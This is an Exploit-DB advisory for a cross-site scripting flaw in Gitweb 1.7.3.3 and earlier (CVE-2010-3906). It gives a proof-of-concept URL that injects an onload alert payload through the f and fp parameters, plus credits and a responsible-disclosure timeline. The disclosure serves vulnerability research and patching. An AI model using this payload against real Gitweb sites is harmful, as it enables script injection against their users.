Gitweb <= 1.7.3.3 - Cross-Site Scripting

2010-12-15T00:00:00
ID EDB-ID:15744
Type exploitdb
Reporter emgent
Modified 2010-12-15T00:00:00

Description

Gitweb <= 1.7.3.3 - Cross-Site Scripting. CVE-2010-3906. Webapps exploit for cgi platform

                                        
                                            &gt;-8 Description 8-&lt;
Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions
allows remote attackers to inject arbitrary web script or HTML code via f and fp variables.

&gt;-8 Proof Of Concept 8-&lt;
http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]
[XSS] =&gt; "&gt;&lt;body onload="alert('xss')"&gt; &lt;a


&gt;-8 Credits 8-&lt;
Emanuele 'emgent' Gentili &lt;e.gentili@tigersecurity.it&gt;


&gt;-8 Responsible Disclosure 8-&lt;

13-12-2010	Initial contact with upstream and vendor-sec
13-12-2010	Vendor Response and CVE-2010-3906 assignation
15-12-2010	Public Disclosure